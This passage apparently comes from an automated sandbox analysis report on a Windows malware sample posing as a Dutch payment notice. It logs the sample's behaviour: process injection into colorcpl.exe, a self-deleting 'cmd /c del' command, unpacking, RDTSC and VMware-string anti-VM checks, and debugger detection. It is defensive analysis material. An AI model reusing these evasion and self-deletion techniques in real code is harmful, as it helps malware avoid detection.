          Source: Betaling_advies.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Betaling_advies.exe, File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: Betaling_advies.exe, ReversingLabs: Detection: 14%
          Source: C:\Users\user\Desktop\Betaling_advies.exe, File read: C:\Users\user\Desktop\Betaling_advies.exe
          Source: unknown, Process created: C:\Users\user\Desktop\Betaling_advies.exe 'C:\Users\user\Desktop\Betaling_advies.exe'
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Process created: C:\Users\user\Desktop\Betaling_advies.exe 'C:\Users\user\Desktop\Betaling_advies.exe'
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Betaling_advies.exe'
          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Process created: C:\Users\user\Desktop\Betaling_advies.exe 'C:\Users\user\Desktop\Betaling_advies.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Betaling_advies.exe'
          Source: C:\Users\user\Desktop\Betaling_advies.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: C:\xampp\htdocs\Cryptor\74d81a217a414a2aaee1ac9ce14525a2\Loader\Loader\Release\22ct3mhbr.pdb source: Betaling_advies.exe, 00000000.00000002.654453331.0000000000788000.00000004.00020000.sdmp, 571kzkbal.dll.0.dr
          Source: Binary string: colorcpl.pdbGCTL source: Betaling_advies.exe, 00000001.00000002.692704063.0000000000D70000.00000040.00000001.sdmp
          Source: Binary string: colorcpl.pdb source: Betaling_advies.exe, 00000001.00000002.692704063.0000000000D70000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.666885783.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Betaling_advies.exe, 00000000.00000003.646799474.000000001EEB0000.00000004.00000001.sdmp, Betaling_advies.exe, 00000001.00000002.692105049.0000000000B2F000.00000040.00000001.sdmp, colorcpl.exe, 00000007.00000002.910878162.00000000047BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Betaling_advies.exe, colorcpl.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.666885783.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Unpacked PE file: 1.2.Betaling_advies.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_004153DD push ebp; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00417DC3 pushad ; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00415E10 push edi; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00414F69 push edx; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A8D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_1_004153DD push ebp; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_1_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_1_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_1_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_1_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_1_00417DC3 pushad ; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_1_00415E10 push edi; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_1_00414F69 push edx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0471D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_025453DD push ebp; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0254B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0254B3FB push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0254B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02545E10 push edi; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02544F69 push edx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0254B45C push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02547DC3 pushad ; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exe | File created: C:\Users\user\AppData\Local\Temp\nsx3A6A.tmp\571kzkbal.dll
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Betaling_advies.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Betaling_advies.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe | RDTSC instruction interceptor: First address: 00000000025385E4 second address: 00000000025385EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe | RDTSC instruction interceptor: First address: 000000000253896E second address: 0000000002538974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Betaling_advies.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6552 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6892 | Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000004.00000002.920747252.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.670369166.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.667370950.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.917151213.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000002.920747252.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.670564203.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000002.920747252.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.670650414.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000002.920747252.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 0_2_02651628 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 0_2_02651840 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A6F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A39080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00ACB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00B04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00B01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AF2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AB69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A6A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A5C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A62990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AC41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A54120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A3C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A6FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A62AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A62ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A74A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A48A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A35210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A53A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00B08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A7927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AFEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AC4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00B05BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AF138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A62397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A6B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A5DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AF131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A3DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A63B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A3DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00B08B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A3F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A4849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AF14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00B08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A6BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00B0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A5746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A6A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00ACC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00B005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AE8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ABA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A73D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AE3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A57D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A78EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AEFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AEFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3C600 mov eax, dword ptr fs:[00000030h]
